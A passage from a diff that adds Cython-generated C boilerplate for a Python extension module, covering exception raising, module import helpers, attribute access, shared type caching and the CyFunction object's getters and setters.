likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__3); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* decode_c_bytes */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_bytes( + const char* cstring, Py_ssize_t length, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + if (unlikely((start < 0) | (stop < 0))) { + if (start < 0) { + start += length; + if (start < 0) + start = 0; + } + if (stop < 0) + stop += length; + } + if (stop > length) + stop = length; + if (unlikely(stop <= start)) + return __Pyx_NewRef(__pyx_empty_unicode); + length = stop - start; + cstring += start; + if (decode_func) { + return decode_func(cstring, length, errors); + } else { + return PyUnicode_Decode(cstring, length, encoding, errors); + } +} + +/* RaiseClosureNameError */ +static CYTHON_INLINE void __Pyx_RaiseClosureNameError(const char *varname) { + PyErr_Format(PyExc_NameError, "free variable '%s' referenced before assignment in enclosing scope", varname); +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* FetchSharedCythonModule */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void) { + PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); + if (unlikely(!abi_module)) return NULL; + Py_INCREF(abi_module); + return abi_module; +} + +/* FetchCommonType */ +static int __Pyx_VerifyCachedType(PyObject *cached_type, + const char *name, + Py_ssize_t basicsize, + Py_ssize_t expected_basicsize) { + if (!PyType_Check(cached_type)) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s is not a type object", name); + return -1; + } + if (basicsize != expected_basicsize) { + PyErr_Format(PyExc_TypeError, + "Shared Cython type %.200s has the wrong size, try recompiling", + name); + return -1; + } + return 0; +} +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { + PyObject* abi_module; + const char* object_name; + PyTypeObject *cached_type = NULL; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + object_name = strrchr(type->tp_name, '.'); + object_name = object_name ? object_name+1 : type->tp_name; + cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + if (__Pyx_VerifyCachedType( + (PyObject *)cached_type, + object_name, + cached_type->tp_basicsize, + type->tp_basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + if (PyType_Ready(type) < 0) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) + goto bad; + Py_INCREF(type); + cached_type = type; +done: + Py_DECREF(abi_module); + return cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#else +static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { + PyObject *abi_module, *cached_type = NULL; + const char* object_name = strrchr(spec->name, '.'); + object_name = object_name ? object_name+1 : spec->name; + abi_module = __Pyx_FetchSharedCythonABIModule(); + if (!abi_module) return NULL; + cached_type = PyObject_GetAttrString(abi_module, object_name); + if (cached_type) { + Py_ssize_t basicsize; +#if CYTHON_COMPILING_IN_LIMITED_API + PyObject *py_basicsize; + py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); + if (unlikely(!py_basicsize)) goto bad; + basicsize = PyLong_AsSsize_t(py_basicsize); + Py_DECREF(py_basicsize); + py_basicsize = 0; + if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; +#else + basicsize = likely(PyType_Check(cached_type)) ? ((PyTypeObject*) cached_type)->tp_basicsize : -1; +#endif + if (__Pyx_VerifyCachedType( + cached_type, + object_name, + basicsize, + spec->basicsize) < 0) { + goto bad; + } + goto done; + } + if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; + PyErr_Clear(); + CYTHON_UNUSED_VAR(module); + cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); + if (unlikely(!cached_type)) goto bad; + if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; + if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; +done: + Py_DECREF(abi_module); + assert(cached_type == NULL || PyType_Check(cached_type)); + return (PyTypeObject *) cached_type; +bad: + Py_XDECREF(cached_type); + cached_type = NULL; + goto done; +} +#endif + +/* PyVectorcallFastCallDict */ +#if CYTHON_METH_FASTCALL +static PyObject *__Pyx_PyVectorcall_FastCallDict_kw(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + PyObject *res = NULL; + PyObject *kwnames; + PyObject **newargs; + PyObject **kwvalues; + Py_ssize_t i, pos; + size_t j; + PyObject *key, *value; + unsigned long keys_are_strings; + Py_ssize_t nkw = PyDict_GET_SIZE(kw); + newargs = (PyObject **)PyMem_Malloc((nargs + (size_t)nkw) * sizeof(args[0])); + if (unlikely(newargs == NULL)) { + PyErr_NoMemory(); + return NULL; + } + for (j = 0; j < nargs; j++) newargs[j] = args[j]; + kwnames = PyTuple_New(nkw); + if (unlikely(kwnames == NULL)) { + PyMem_Free(newargs); + return NULL; + } + kwvalues = newargs + nargs; + pos = i = 0; + keys_are_strings = Py_TPFLAGS_UNICODE_SUBCLASS; + while (PyDict_Next(kw, &pos, &key, &value)) { + keys_are_strings &= Py_TYPE(key)->tp_flags; + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(kwnames, i, key); + kwvalues[i] = value; + i++; + } + if (unlikely(!keys_are_strings)) { + PyErr_SetString(PyExc_TypeError, "keywords must be strings"); + goto cleanup; + } + res = vc(func, newargs, nargs, kwnames); +cleanup: + Py_DECREF(kwnames); + for (i = 0; i < nkw; i++) + Py_DECREF(kwvalues[i]); + PyMem_Free(newargs); + return res; +} +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw) +{ + if (likely(kw == NULL) || PyDict_GET_SIZE(kw) == 0) { + return vc(func, args, nargs, NULL); + } + return __Pyx_PyVectorcall_FastCallDict_kw(func, vc, args, nargs, kw); +} +#endif + +/* CythonFunctionShared */ +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj) { +#if PY_VERSION_HEX < 0x030900B1 + __Pyx_Py_XDECREF_SET( + __Pyx_CyFunction_GetClassObj(f), + ((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#else + __Pyx_Py_XDECREF_SET( + ((PyCMethodObject *) (f))->mm_class, + (PyTypeObject*)((classobj) ? __Pyx_NewRef(classobj) : NULL)); +#endif +} +static PyObject * +__Pyx_CyFunction_get_doc(__pyx_CyFunctionObject *op, void *closure) +{ + CYTHON_UNUSED_VAR(closure); + if (unlikely(op->func_doc == NULL)) { + if (((PyCFunctionObject*)op)->m_ml->ml_doc) { +#if PY_MAJOR_VERSION >= 3 + op->func_doc = PyUnicode_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#else + op->func_doc = PyString_FromString(((PyCFunctionObject*)op)->m_ml->ml_doc); +#endif + if (unlikely(op->func_doc == NULL)) + return NULL; + } else { + Py_INCREF(Py_None); + return Py_None; + } + } + Py_INCREF(op->func_doc); + return op->func_doc; +} +static int +__Pyx_CyFunction_set_doc(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (value == NULL) { + value = Py_None; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_doc, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_name(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_name == NULL)) { +#if PY_MAJOR_VERSION >= 3 + op->func_name = PyUnicode_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#else + op->func_name = PyString_InternFromString(((PyCFunctionObject*)op)->m_ml->ml_name); +#endif + if (unlikely(op->func_name == NULL)) + return NULL; + } + Py_INCREF(op->func_name); + return op->func_name; +} +static int +__Pyx_CyFunction_set_name(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__name__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_name, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_qualname(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_qualname); + return op->func_qualname; +} +static int +__Pyx_CyFunction_set_qualname(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); +#if PY_MAJOR_VERSION >= 3 + if (unlikely(value == NULL || !PyUnicode_Check(value))) +#else + if (unlikely(value == NULL || !PyString_Check(value))) +#endif + { + PyErr_SetString(PyExc_TypeError, + "__qualname__ must be set to a string object"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_qualname, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_dict(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(op->func_dict == NULL)) { + op->func_dict = PyDict_New(); + if (unlikely(op->func_dict == NULL)) + return NULL; + } + Py_INCREF(op->func_dict); + return op->func_dict; +} +static int +__Pyx_CyFunction_set_dict(__pyx_CyFunctionObject *op, PyObject *value, void *context) +{ + CYTHON_UNUSED_VAR(context); + if (unlikely(value == NULL)) { + PyErr_SetString(PyExc_TypeError, + "function's dictionary may not be deleted"); + return -1; + } + if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "setting function's dictionary to a non-dict"); + return -1; + } + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->func_dict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_globals(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(context); + Py_INCREF(op->func_globals); + return op->func_globals; +} +static PyObject * +__Pyx_CyFunction_get_closure(__pyx_CyFunctionObject *op, void *context) +{ + CYTHON_UNUSED_VAR(op); + CYTHON_UNUSED_VAR(context); + Py_INCREF(Py_None); + return Py_None; +} +static PyObject * +__Pyx_CyFunction_get_code(__pyx_CyFunctionObject *op, void *context) +{ + PyObject* result = (op->func_code) ? op->func_code : Py_None; + CYTHON_UNUSED_VAR(context); + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_init_defaults(__pyx_CyFunctionObject *op) { + int result = 0; + PyObject *res = op->defaults_getter((PyObject *) op); + if (unlikely(!res)) + return -1; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + op->defaults_tuple = PyTuple_GET_ITEM(res, 0); + Py_INCREF(op->defaults_tuple); + op->defaults_kwdict = PyTuple_GET_ITEM(res, 1); + Py_INCREF(op->defaults_kwdict); + #else + op->defaults_tuple = PySequence_ITEM(res, 0); + if (unlikely(!op->defaults_tuple)) result = -1; + else { + op->defaults_kwdict = PySequence_ITEM(res, 1); + if (unlikely(!op->defaults_kwdict)) result = -1; + } + #endif + Py_DECREF(res); + return result; +} +static int +__Pyx_CyFunction_set_defaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyTuple_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__defaults__ must be set to a tuple object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__defaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_tuple, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_defaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_tuple; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_tuple; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_kwdefaults(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value) { + value = Py_None; + } else if (unlikely(value != Py_None && !PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__kwdefaults__ must be set to a dict object"); + return -1; + } + PyErr_WarnEx(PyExc_RuntimeWarning, "changes to cyfunction.__kwdefaults__ will not " + "currently affect the values used in function calls", 1); + Py_INCREF(value); + __Pyx_Py_XDECREF_SET(op->defaults_kwdict, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_kwdefaults(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->defaults_kwdict; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + if (op->defaults_getter) { + if (unlikely(__Pyx_CyFunction_init_defaults(op) < 0)) return NULL; + result = op->defaults_kwdict; + } else { + result = Py_None; + } + } + Py_INCREF(result); + return result; +} +static int +__Pyx_CyFunction_set_annotations(__pyx_CyFunctionObject *op, PyObject* value, void *context) { + CYTHON_UNUSED_VAR(context); + if (!value || value == Py_None) { + value = NULL; + } else if (unlikely(!PyDict_Check(value))) { + PyErr_SetString(PyExc_TypeError, + "__annotations__ must be set to a dict object"); + return -1; + } + Py_XINCREF(value); + __Pyx_Py_XDECREF_SET(op->func_annotations, value); + return 0; +} +static PyObject * +__Pyx_CyFunction_get_annotations(__pyx_CyFunctionObject *op, void *context) { + PyObject* result = op->func_annotations; + CYTHON_UNUSED_VAR(context); + if (unlikely(!result)) { + result = PyDict_New(); + if (unlikely(!result)) return NULL; + op->func_annotations = result; + } + Py_INCREF(result); + return result; +} +static PyObject * +__Pyx_CyFunction_get_is_coroutine(__pyx_CyFunctionObject *op, void *context) { + int is_coroutine; + CYTHON_UNUSED_VAR(context); + if (op->func_is_coroutine) { + return __Pyx_NewRef(op->func_is_coroutine); + } + is_coroutine = op->flags & __Pyx_CYFUNCTION_COROUTINE; +#if PY_VERSION_HEX >= 0x03050000 + if (is_coroutine) { + PyObject *module, *fromlist, *marker = __pyx_n_s_is_coroutine; + fromlist = PyList_New(1); + if (unlikely(!fromlist)) return NULL; + Py_INCREF(marker); + PyList_SET_ITEM(fromlist, 0, marker); + module = PyImport_ImportModuleLevelObject(__pyx_n_s_asyncio_coroutines, NULL, NULL, fromlist, 0); + Py_DECREF(fromlist); + if (unlikely(!module)) goto ignore; + op->func_is_coroutine = __Pyx_PyObject_GetAttrStr(module, marker); + Py_DECREF(module); + if (likely(op->func_is_coroutine)) { + return __Pyx_NewRef(op->func_is_coroutine); + } +ignore: + PyErr_Clear(); + } +#endif + op->func_is_coroutine = __Pyx_PyBool_FromLong(is_coroutine); + return __Pyx_NewRef(op->func_is_coroutine); +} +static PyGetSetDef __pyx_CyFunction_getsets[] = { + {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, + {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, + {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, + {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, + {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, + {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, + {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, + {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; 